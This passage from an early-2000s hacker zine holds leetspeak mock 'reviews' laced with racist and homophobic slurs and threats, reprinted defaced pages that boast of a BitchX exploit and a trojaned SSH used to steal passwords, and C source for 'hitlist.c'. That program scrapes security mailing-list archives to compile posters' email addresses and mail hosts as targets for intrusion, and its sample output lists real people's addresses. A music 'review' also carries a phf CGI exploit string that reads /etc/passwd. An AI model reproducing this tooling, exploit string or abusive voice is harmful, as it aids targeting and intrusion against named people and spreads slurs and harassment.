bl4d3 1d st4b h1m w1th a t00thp1ck, 1c3 l1v3z w1th h1z m0m & 1 h34r fl4m3z g0t a sm4ll d1ck.... y0 y0 aiy0 d0nt step 2 my krew, kuz 1ll fuqn k4p y0u. f00. t4p t4p ch3q." d4mn! iz all i k4n s4y, koz th3 c0c00n 1z full 0f th1s sh1t. 4ngry lyrix... th3y t4lk ab0ut st4bb1ng th3ir l4wyerz 1n c0urt, dr1nk1n 40z wh1le talkin on th4 I SEEK Y0U, buztn 0ut 0f j41l l1ke n3d k3lly, b1tch3z 1n h1gh sk00l th@ cheat 0n algebr4 t3stz, h0w much p4y1ng ch1ld supp0rt 4 a bunch 0f k1dz suxxxx, m4n 1 d0nt even want 2 sp0il th1z, itz tru-thug. pers0nally my fav0r1te tr4ckz 0f th1z cd r #2. CHEATERZ & #11. THE COURTR00M and 13. SH0W THEZE k4TZ (lab3ll3d 0n th31r webs1te az *H0T*). wh4t3v3r they d3c1d3 2 d0, r00tabega k33pz a p0s1t1v3 1m4g3. r1sh1, 4z y0ung 1nd14n b0y gr0wn up 1n th3 gh3tt0 h4d 2 s1t by and w4tch h1z y0unger br0ther wear1ng a ch1cag0 bullz jerzey get gunn3d d0wn 2 d34th by cr1pz. s331ng s0 much vi0lence in h1z d4y, & w4tch1ng h1z g00d h0meb0yz m0st8d & l00ph0le & m1ndphazr g0 2 the p3n, he m0urnz 4 th31r return & the dayz 0f tru defac3m3nt thugg3ry. 1n hiz s0ngz, he expl41nz, h0w new sk00l def4c3rz just d0nt underst4nd what 1t uz3d 2 m34n 2 the el8z, the gHerz, the 3lv3z. th1z album 1z def1n1tely a 2 thumbz up. w00w00 ------ ch3ck 1t 0ut @ http://www.w00w00.org/w00w00.mp3 w1th 0ver 30 memb3rz w0rldw1de & th1z 1z the b3st sh1t they k0uld k0me up w1th!?!?!?!? th1z 1z fuqn kr4p, 1tz even w0rse than th31r k0d3z. w0uld u listen 2 a k0p r4pp1ng? 0k damn, s0 why the phuq w0uld u l1st3n 2 a bunch 0f wh1teh@ l4m3rz pr3t3nd1ng 2 haq. 1f 1 were 1n the wu-t4ng kl4n 1 w0uld kut their n*tz 0ff, espec14lly th@ n4spt3r f4g. m1xt3r ------ 0k well th1z 1znt r34lly "thugg1sh" but 1tz undergr0und h4qr muz1k s0 uncle m4v1s dec1d3d 2 rev1ew 1t just 4 u. & th1z 1z n0 disappo1ntment e1th3r. m1xter haz sh0wn he d0eznt just kn0w h0w 2 wr1te wh1tepap3rz 4 packetst0rm, he k4n als0 wr1te s0me ph@ muz1k 2! m1xt3r d0eznt even try 2 be a thug, h3z just pure h4qr. w1th s0ng n4m3z like "/usr/bin/strings" and "1ntrusi0n det3kt3d" and "/cgi-bin/phf?Qalias=%0acat%20/etc/passwd." 1 def1n1tely w0uld n0t rec0mmend th1z 4 l1st3n1ng 2 pe0ple outs1d3 0f the 'sc3n3' becuz it iz 1nf0rmation 0verl0ad! but 4 th0ze 0f u wh0 th1nk u h4v3 wh4t 1t t4k3z 2 dec1ph3r hiz kryptik msgz, u k4n f1nd h1z muzik @ http://www.mp3.com/mixter/ th3z3 s0ngs rem1nd me a l0t 0f th1z 0ne t1me 1 s4w th3z3 2 austrian d00dz french k1ss1ng each0ther in an 'E wild 0n 1b1z4.' but enuf of th@ /usr/bin/strings s0undz a bit retro, with s0me atar1 l1ke s0undz 2 rem1nd u of exactly h0w 0ld sk00l m1xter really is, & synthlinez th@ w0uld bl0w depeche m0de 0ut 0f the w4t3r. m1xt3r, as he l1k3z 2 r3f3r 2 himself az 'DJ MIXY' 2 th3 r3st 0f the w0rld 0fferz h1z serv1c3z 2 th3 c0mmun1ty by dj'ing in s4f3 drug phr33 b4r m1tvahz in t3l av1v, where h1z t0pn0tch internet sekur1ty k0mpany w1th phell0w h4ck1ng st4rz ANALYZER and IZIK of hwa-security/d4rkn3t 1z l0c8d. s0met1m3z when he iz juzt "chiln 0ut" he k4n be f0und d4nc1ng @ w1ld r4v3z @ the g4z4 str1p w1th h1z p4t3nt3d redwhite'nblue gl0wst1ckz & vickz inh4l3r. but h3 d03z m0st 0f h1z w0rk 4 fr33, s1nc3 az m4ny grey/bl4ckhatz he shunz the c0mmercializ4t10n 0f s0phtjuarez & releasez hiz trax under GPL! he als0 h0pez th@ 0ne day s0meb0dy w1ll B insp1r3d by h1z s0ngz 2 0wn a univers1ty netw0rk w1th m1cr0s0ft w1nd0wz src k0de & d0n8 the ph1nd1ngz 2 him! ~el8 4tt3mpt3d 2 k0nt4kt mixter 4 an 1nterv1ew ab0ut h1z muz1k but he angrily d3kl1n3d, s4y1ng he w0uld never 't4lk 2 u squinty 3y3d m0th3rphuckrz' as l0ng 4s 'th3 br34th 0f l1fe fu3l3d h1z b0dy.' h3 th3n ch4ll3ng3d uncle m4v1s 2 "get my passw0rd ph1le again" s1nce h1z b0x d0eznt all0w 0utg01ng em41lz 2 j4p4n anym0r3. th1z wuz unfphortun8 but 4 the s4ke 0f 0bjekt1v1ty uncle m4v1s g1vez thiz album a "p0sitive" rev1ew. y0 well th@z all the muz1k 1 k0uld find 4 n0w! r3m3mb3r 2 k33p 1t r34l peace 0ut d/-\wGz. .~e~----------------------------------------------------------~e~. ; *06* defacements of the milenium -- ~el8 ; `----------------------------------------------------------------' -----------------------. anti.security.is owned 0 ~~~ :PpPPppPPPp -----------------------' turkey Oh, life it's bigger, it's bigger than you and you are not me The lengths that I will go to, the distance in your eyes WE ARE THE HACKERS WHO ACTUALLY HACK. UNLIKE OTHER "HACKERS," WE DON'T SIT ON OUR WAREZ. ACTION SPEAKS LOUDER THAN SILLY WORDS. GOBBLES IS ABOUT GETTING THINGS DONE. THANKS TO THE POP PSYCHOLOGISTS ON THE ANTISEC MESSAGE BOARD. YOUR COMBINED PSYCHOANALYSIS MISSED UNCONTROLLABLE URGES TO DEFACE SECURITY WEBSITES THOUGH! 2002 IS YEAR OF TURKEY. MAKE NO MISTAKE ABOUT THIS. AND THERE'S NOTHING ANYONE CAN DO... THIS HACK MADE POSSIBLE WITH BITCHX REMOTE EXPLOIT AGAINST JIMJONES HOME COMPUTER THEN TROJANING HE SSH TO COLLECT PASSWORDS... ------------------------. udp's livejournal owned 0 ~~~ :PpPPppPPPp ------------------------' [2041] udp the lame phrack whore's LiveJournal [Most Recent Entries] [Calendar View] [Friends] Below are the 20 most recent journal entries recorded in udp the lame phrack whore's LiveJournal: [ << Previous 20 ] Monday, December 31st, 2001 12:42 pm Been rereading Leisure Town and laughing my ass off. (Comment on this) 11:38 am owned in the 2002 yo chek it, im fat & owned keep it re4l libnetx25 el8.8m.com watch your back we out (Comment on this) Sunday, December 30th, 2001 4:12 pm Add Hope Sandoval to the list from the 25th. Fantastic. :) Current Music: Mazzy Star - Wild Horses(2 Comments |Comment on this) 1:38 pm mmm. the big chill. you must get this track. Current Mood: chillllled Current Music: Mescalito - Shoreditch Oyster(Comment on this) 1:23 pm Desi-derata. Current Mood: caffeinating Current Music: Mescalito - Dark Corner Light(Comment on this) Saturday, December 29th, 2001 10:10 pm hrm. looking at wmglobe, again, it seems most of the populated human world is in darkness right now. whack. the sun's shining high above the pacific; the pacific's enormous. Current Music: Veruca Salt - Bodies(Comment on this) 3:14 pm Obviously CURRENT doesn't like my dirty hack of hijacking the IPPROTO_RSVP pointer in ip_protosw[]. (Comment on this) 3:09 pm the sun is out. free of its grey bonds finally. eclectic love washing over the city. (Comment on this) 2:57 pm Bah! I just loaded my driver into -CURRENT - BOOM! Works fine on -STABLE though. Oh well, hacking time... (Comment on this) 11:47 am Protected A rare sighting *o* mudge [~mudge@0nus.l0pht.com] has joined #cdc *o* irc.carrier1.net.uk Saturday December 29 2001 -- 11:44:25 +00:00 Hm! Just as I was about to head out for lunch, too... (Comment on this) 11:43 am Musings on zen and singing. An overcast day in London today. Dull grey cloud settled over the city like white taffy, hydrogenated, a smooth constriction. I rise, wash, put my boots on and make coffee. I feel the cool air rise against my damp, freshly depilated skin. The thermostat clicks as the heater switches off, the aesthetic of warmth lost on the machine, for it is thus. I run my hand over my forehead, and around my fringe. I smile, knowing what it is to live in the moment, and that though our best laid plans and fondest dreams may never come to fruition, living in the moment is that which is most important. After a spate of not being able to sleep well, I suddenly find myself enjoying the most pleasant, restful night's sleep, and this has been the case some three nights in a row now. Last night my final thought before leaving wakefulness was this: how does Kate Bush feel about her success and her life? I wonder if she has always wanted to be where she has gotten to. I think one could well ask these questions of any successful person. Is it atypical to be blown off one's original course, and yet still discover one's own New World? Or is it an occupational hazard? When hungry, eat. When tired, sleep. (Comment on this) 12:25 am There are some screen grabs of my desktop from today here. (3 Comments |Comment on this) Thursday, December 27th, 2001 1:26 pm Ok. I submitted 7 new FreeBSD ports inside 12 hours. Can I have a biscuit? (2 Comments |Comment on this) 7:24 am Submitted FreeBSD port for x11-fonts/gfe (GNU Font Editor 0.0.4). (Comment on this) Wednesday, December 26th, 2001 10:05 pm Without memories, a race has no future. (3 Comments |Comment on this) Tuesday, December 25th, 2001 1:20 pm A quiet day of fond restitude, for the weary traveller. Mmmm. Having a very chilled out Yule; curling up with some Baileys and wotnot, listening to music and reading books. What a holiday should be at this time of year, I think. A time to nurture dreams anew and sow amongst the furrows of the psyche. Been on a different tack with mp3 playlists lately, need female vocalists to pace out all this D'n'B, industrial, trance... so this manifests itself in the form of Tori Amos, Paula Cole, Beth Orton, Alison Moyet, Louise Post (of Veruca Salt fame), Sarah McLachlan, and of course, Kate Bush. As for the delectable Ms Bush, she will hopefully have an album out during 2002, which I am looking forward to with anticipation. I still hold Wuthering Heights to be one of her best tracks of all time... In the meantime, you might like to check out Paula Cole's work. She teamed up with Peter Gabriel on his Secret World Tour in 1993, and you can hear her passion, and diverse vocal range, on tracks such as Talk To Me and Hush Hush Hush. Those of you who are fans of Peter Gabriel also will also clock that Peter's last longstanding female vocal partner was... stand up, Kate Bush! As a longstanding fan of Peter's work I have to say I admire his knack for working with the female voice. He confessed that it was a skill he acquired over many years, in an interview on ITV (1993, UK); indeed much of his work from the late 1970s, after he split from Genesis, took on more of a masculine edge than what one experiences from his albums So (1986) and Us (1992); the latter was produced by the brilliant Daniel Lanois, featured on U2's superb Achtung Baby (1990). Paula, however, reveals a much flirtier side to her work, in a song from the motion picture soundtrack for the Wim Wenders film City of Angels, a track entitled Feelin' Love. As you can see from the lyric sheet, it's quite candid, but you really have to hear her singing this; she manages to come across as sensual without being kitsch or trashy. It's a departure from her other tracks, lest we begin to think the adorable Miss Cole is a goody two-shoes. I can't really put into words how enthused I am by her talent. Her voice helps to create a fertile creative space for me; it's only over the past two years or so that I've begun to realize how essential the immediate environment is to the creative act, be that making music, writing code, sculpting; or any other form of play. Isolation alone is not the way to get the job done; often it's good to invite a bunch of friends over, share the Baileys or Jasmine tea or whatever the tipple is, and then return to one's work, having given the machine-mind a rest and returned to social consciousness, if only for a few hours. My plans for 1Q 2002 are still being worked on; I also need to decide what to do this upcoming summer. I'm open to suggestions for places to visit, hang out, have a good time. And like that rubberband girl in the red shoes, I bounce back on my feet. Fond greetings to friends present and past, in whatever mode you choose to celebrate the Solstice; I wish you all well. Current Mood: pleasantly inert Current Music: Kate Bush - Rubberband Girl(1 Comment |Comment on this) Thursday, November 29th, 2001 2:16 pm Just woke up. Urrrrrrrrgggggh. Upgraded the -CURRENT box late last night - the change alone from a Realtek to an Intel FXP makes a *massive* difference. FreeBSD now supports every single bit of hardware in the box. Matt Dillon gave an interview very recently where he cites the current SMPng work and the OpenGL support as the main hurdles to be overcome for FreeBSD at the moment. I agree - once OpenGL support is in place, I will have very little reason to run Windows, or even Linux, for that matter, ever again. One exception is IrDA support, but I might choose to port that anyway. Anyway. I'm eating a pot rice at the moment, deferring real food until we (people are here) decide what we're going to do. *stretches* (Comment on this) Wednesday, November 28th, 2001 11:11 am Is it any wonder I can't sleep? (apologies to Smashing Pumpkins) Woke up at 10pm last night, my sleeping pattern is TOTALLY shafted... it's out of control, and the kids just love it! (props to KMFDM...) As of this morning I've written FreeBSD ports entries for Dug Song's libdnet, a portable packet generation and low-level networking API, and Tony Curtis's wots, which is an extremely cool system log monitoring program written in Perl. I've been using wots for literally years now. Rock on. Hopefully other people will find them useful. qtop is working spankingly for my droptail queues on the WaveLAN gateway, but I need to clean up the code, fix it to work with RED/wRED dispatcher, and get it committed to FreeBSD-CURRENT. Current Music: Technical Itch - Deadline(Comment on this) Monday, November 26th, 2001 9:25 am Access granted. I've just written and released a tool to perform real-time monitoring of the FreeBSD Bandwidth Shaper, as part of the Consume Project. It's essential that we be able to throttle bandwidth on a per-node basis to prevent wired links to the mobile cloud becoming saturated. This tool will help us to configure the bandwidth shaper at each node. Getting the hang of the masking for the packet flow sets is quite tricky; this will help the community networking effort by allowing people to experiment with bandwidth throttling and getting visual (as well as anecdotal) feedback on the effect of their configuration changes. You MUST get the track I'm listening to. At the moment I'm pretty frazzled on caffeine having been awake for most of the weekend and Friday, and have the heating turned down to keep me frosty. Oh yeah. What else is cool. ParMaster hung with us at the weekend. Current Mood: accomplished Current Music: Apoptygma Berzerk - Kathy's Song (Ferry Corsten Remix)(1 Comment |Comment on this) Monday, November 19th, 2001 3:06 am ick, writing parsers is such a chore. (Comment on this) [ << Previous 20 ] My Website About LiveJournal.com .~e~----------------------------------------------------------~e~. ; *07* ~el8 hitlist tools -- uncle m4v1s ; `----------------------------------------------------------------' ~el8 ~el8 has has generated generated hitlists hitlists for for every every security security related related mailing mailing list list known 4r3z known to urfukd to mankind mankind h3re y0u g0 d00dz, str8 fr0m the ~el8 w4r3z gr4bb4g. th1s t00l w1ll h3lp 0ur f0ll0w3rz by cre4t1ng h1tl1sts of emails/systems that p0st t0 vari0uz security f0cus mailing lists. ~el8 ADVISORY STYLE S0LLUTI0N: d0nt p0st t0 th3z3 mail1ng lizts ex4mple 0utput: $ ./hitlist 1 LAMER: sh0@libertynet.de (sh0) LAMER BOX: cybersilo.lnx LAMER: tsmith@zonelabs.com (Te Smith) LAMER BOX: mail.securityfocus.com LAMER: merchantjosh@qwest.net (Joshua Merchant) LAMER: draht@suse.de (Roman Drahtmueller) LAMER BOX: dent.suse.de LAMER: secnotif@microsoft.com (Microsoft Product Security) LAMER: newsflash@macromedia.com (Macromedia Security Alert) LAMER BOX: rsigate.macromedia.com LAMER: joacim@axis.com (Joacim Tullberg) LAMER BOX: mail.securityfocus.com LAMER: tluce@pti-pump.com (Timothy Luce) LAMER BOX: PTIPump.com LAMER: support_feedback@us-support.external.hp.com (IT Resource) LAMER: wichert@wiggy.net (Wichert Akkerman) LAMER BOX: wiggy.net LAMER: raistlin@gioco.net (Raistlin) LAMER: cadence@apollo.aci.com.pl (Tomasz Grabowski) LAMER: dotslash@snosoft.com (KF) LAMER BOX: snosoft.com LAMER: flatline@blackhat.nl (flatline) LAMER BOX: mail.werkopmaat.nl LAMER: adonis1@videotron.ca (Adonis.No.Spam) LAMER BOX: videotron.ca LAMER: gobbles@hushmail.com LAMER BOX: mailserver1.hushmail.com LAMER: seclsts@fast.net (Rich Henning) LAMER BOX: fast.net LAMER: alexm@pycckue.org (alex medvedev) LAMER: pr0ix@def-con.org (pr0ix) [CUT_HERE] hitlist.c /* * l4m3r l1zt3r v1.0 by uncle m4v1s * th1z 1z a s1mple t00l th@ ~el8 haz been uzing 4 several ye4rz, * ever s1nce pr0ject m4yh3m wuz 1st st4rt3d. * 1tz a 1-use t00l, juzt run th1z on any 0ne of the k-l4m3 * s1tez upd8d by secur1tyf0cus.com on the1r ml-p0rtal, & * u n0w h4ve a l1zt 0f ret4rdz 2 hack and st34l "0day" from. * th1zt skr1pt g0ez back s3v3ral ye4rz s0 u get the ch4nc3 2 * ch3ck 0ut r34l b0xez th@ were uz3d be4 the gr34t p4n-l4m3r * 3ff0rt 2 get sc3n3 sh3llz 2 h1de the1r 1dent1t3z. * by t4rg3tt1ng p0stz by p0l1te sekur1ty pr0fess10nalz & * 0wn1ng the1r `sh1t` and r4v4g1ng th3 kn0wn_h0stz 0n the ab0ve * b0x3z, we n0t1c3d the subtl3 c0rrel4t10n betw33n m4n & myth, * 4nd st4rt3d 2 rek0gn1z3 the k0rrel4t10n betw33n REAL PEOPLE & * the 0nl1ne 1dent1t3z they assum3d. 4 example, 0wn 4ll russ14n * bugtraq p0st3rz s1nce 1997 and u w1ll n0t1c3 4t l34zt 0ne 0f * th3m l0gg1ng 1nt0 z0l0.fr33lsd.n3t/c4nn4b1z.dataf0rce.net (hi str!) * 4nyh0w, 4z rule #2 of pr0jekt m4yh3m g0ez, if u c4nt st34l w4r3z * 0r sn1ff, rm the fukrz! * h4ppy hunt1ng */ #include #include #include #include #include #include #include #include #include #include #define PREFIX "GET http://online.securityfocus.com" #define BASE_CMD "GET http://online.securityfocus.com/archive/1" struct sockaddr_in sinz; struct target{ char *lamercode; char *url; } targets[] = { {"ARIS USERZ","GET http://online.securityfocus.com/archive/114"}, {"bugtraq[lol]","GET http://online.securityfocus.com/archive/1"}, {"bugtraq-es (bugtraq in spain jajaja)", "GET http://online.securityfocus.com/archive/80"}, {"bugtraq-jp & shadowpenguin friendz", "GET http://online.securityfocus.com/archive/79"}, {"cisspstudy [inspired by dr. crispin cowin]", "GET http://online.securityfocus.com/archive/99"}, {"focus-ids [cant sekure a b0x so they use ids]", "GET http://online.securityfocus.com/archive/96"}, {"choose this if u have linux 0day", "GET http://online.securityfocus.com/archive/91"}, {"choose this if u have win32 0day", "GET http://online.securityfocus.com/archive/88"}, {"choose this if u have solaris 0day", "GET http://online.securityfocus.com/archive/92"}, {"scan here for bo2k", "GET http://online.securityfocus.com/archive/100"}, {"forensics (prolly not worth it, they r already 0wned)", "GET http://online.securityfocus.com/archive/104"}, {"honeynet [leave burneye encrypted kopiez" " of nmap 4 lance sp1tzner here]", "GET http://online.securityfocus.com/archive/119"}, {"incidents [see how well pr0ject m4yh3m is d0ing", "GET http://online.securityfocus.com/archive/75"}, {"pen-test [people like s1 here hehe]", "GET http://online.securityfocus.com/archive/101"}, {"sec-papers [4 the literary inkl1n3d like warzael zarcae", "GET http://online.securityfocus.com/archive/112"}, {"security-basics PAHAHAHAHAHA n3wb13z ripe 4 the picking", "GET http://online.securityfocus.com/archive/105"}, {"security-certification [l4m3rz who have subskr1b3d" " 2 security-basics longer than 2 weekz", "GET http://online.securityfocus.com/archive/106"}, { "security-jobs [own theze fuckerz quick, they r desperately" " trying 2 publish 0day]" ,"GET http://online.securityfocus.com/archive/77"}, {"vpn [hehe launch pptphack here]", "GET http://online.securityfocus.com/archive/50"}, {"vuln-dev <- th3 m0ther l4m3r sh1p h4z l4nd3d", "GET http://online.securityfocus.com/archive/82"}, {"choose this if u have shopping kart cgi po1z0n byte warez", "GET http://online.securityfocus.com/archive/107"} }; void printdates(char *url) { char *ptr; int bday,bmonth,byear,eday,emonth,eyear,num; #define MAGIC "/archive/1/" ptr=strstr(url,MAGIC); if(ptr==NULL) return; num=sscanf(url, "/archive/1/%d-%d-%d/%d-%d-%d/" ,&byear,&bmonth,&bday,&eyear,&emonth,&eday); printf("LAMER CHRONOLOGY: "); if(num!=6) printf("ERROR IN PARSING BUT WH0 KAREZ\n"); else printf ("%d/%d/%d to %d/%d/%d\n", bmonth,bday,byear,emonth,eday,eyear); fflush(stdout); } char *makeurl(char *end) { char *r; int size=strlen(PREFIX)+strlen(end)+4; r=malloc(size); if(r==NULL){ fprintf(stderr,"hmm out 0f memory... might be 4 f0rq b0mb!\n"); system("ps -u cr"); exit(-1); } memset(r,0,size); strcpy(r,PREFIX); if(*end!='/') strcat(r,"/"); strcat(r,end); strcat(r,"\r\n"); return r; } void sendcmd(int fd,char *cmd) { write(fd,cmd,strlen(cmd)); write(fd,"\r\n\r\n",2); } int connecthost(void) { int fd; fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(fd<0){ fprintf(stderr,"out of socketz... weird\n"); system("ps aux|egrep tron|mixter|felix"); exit(-1); } if(connect(fd,(struct sockaddr*)&sinz,sizeof(sinz))<0){ fprintf(stderr, "cant connect to online.securityfocus.com...project mayhem successfully accomplished!\n"); exit(-1); } return fd; } /*f-fgetz*/ char* readline(int fd) { static char buf[8192]; char yo; int i = 0; memset(buf,0,sizeof(buf)); for(i=0;iMessage-ID:<"); if(ptr==NULL) goto checkauthor; ptr+=13; ptr=strchr(ptr,'>'); if(ptr==NULL) goto checkauthor; ptr++; ptr=strchr(ptr,'>'); if(ptr==NULL) goto checkauthor; while(*ptr&&*ptr!='@') ptr++; if(!*ptr) goto checkauthor; ptr++; startbox=ptr; while(*ptr&&(isalnum(*ptr)||*ptr=='.')) ptr++; if(!*ptr) goto checkauthor; *ptr=0; /*s4n1tych3ck*/ if(strchr(startbox,'.')==NULL) goto heh; printf("\t\tLAMER BOX: %s\n",startbox); goto heh; checkauthor: ptr=strstr(l,">Author:<"); if(ptr==NULL) goto heh; ptr+=10; ptr=strstr(ptr,"mailto:"); if(ptr==NULL) goto heh; ptr+=7; startemail=ptr; ptr=strchr(ptr,'"'); if(ptr==NULL) goto heh; *ptr++=0; ptr=strchr(ptr,'>'); if(ptr==NULL) goto heh; startname=++ptr; ptr=strchr(ptr,'<'); if(ptr==NULL) goto heh; *ptr=0; printf("\tLAMER: %s",startemail); if(strlen(startname)) printf(" (%s)",startname); printf("\n"); fflush(stdout); heh: l=readline(fd); } close(fd); } /*cykle thru ind3z p4g3z*/ char *letitrip(int fd) { char *l=readline(fd); char *ptr,*start=NULL,*nexturl=NULL,*lamerpost; while(l!=NULL){ /*YO*///printf("line = %s\n",l); /*try p0stz first*/ #define SEKRETKEY "
'); if(ptr==NULL) goto heh; ptr++; if(strstr(ptr,"prev Week")==NULL) goto heh; /*w0rd here iz the previ0uz week*/ if(nexturl==NULL) nexturl=strdup(start); heh: l=readline(fd); } return nexturl; } int main (int argc,char **argv) { struct hostent *he; int fd; char *newurl,*startpoint; if((argc>2)||((argc==2)&&(!strcmp(argv[1],"-h")))){ int i; fprintf(stderr, "l4m3rl1zt3r usage: %s <#>\nwhere # is a l4m3r k4t3g0ry, defaultz 2 bugtraq\n\n",argv[0]); fprintf(stderr,"l4m3r k4t3g0r1ez:\n"); fprintf(stderr,"-----------------\n"); for(i=0;i=(sizeof(targets)/sizeof(struct target))){ fprintf(stderr,"s0rry kouldnt find specif1ed l4m3r...\n"); fprintf(stderr, "there r many more lam3rz, ~el8 iz working ar0und" " the cl0q 2 upd8 thiz program with the necessary 2385915 entriez.\n"); fprintf(stderr,"try a valid # tho\n"); exit(-1); } startpoint=targets[choice].url; } else startpoint=BASE_CMD; fprintf(stderr,"l4m3rl1zt3r v1.0\n"); fprintf(stderr,"by uncle m4v1s\n"); fprintf(stderr,"k0pyright (K) 2002 ~el8 research labz\n"); fprintf(stderr,"for help, try -h\n\n"); he = gethostbyname("online.securityfocus.com"); if(he==NULL){ fprintf(stderr,"cant resolve online." "securityfocus.com...project mayhem successfully accomplished!\n"); exit(-1); } memset(&sinz,0,sizeof(sinz)); sinz.sin_family=AF_INET; sinz.sin_port = htons(80); memcpy(&sinz.sin_addr,he->h_addr,4); fprintf(stderr,"acquiring t4rget l1zt...!\n"); fprintf(stderr,"begin l4m3r l1st tr4nsm1ss10n!\n"); printf("------------------------------\n"); fd=connecthost(); sendcmd(fd,startpoint); printf("LAMER CHRONOLOGY: CURRENT\n"); fflush(stdout); newurl=letitrip(fd); close(fd); if(newurl==NULL){ fprintf(stderr,"weird..some un3xpekt3d sh1t happened!\n"); exit(-1); } while(newurl!=NULL) { char*req; fd=connecthost(); req=makeurl(newurl); sendcmd(fd,req); printdates(newurl); free(newurl); free(req); newurl=letitrip(fd); close(fd); } printf("-------------------------------------\n"); fprintf(stderr,"we h4v3 d3t3kt3d 4ll p0ss1bl3 l4m3rz!\n"); fprintf(stderr,"n0thing l3ft 2 d0..m4ybe ch3ck #!el8.\n"); fprintf(stderr,"-------------------------------------\n"); return 0; } [END_CUT] hitlist.c .~e~----------------------------------------------------------~e~. ; *08*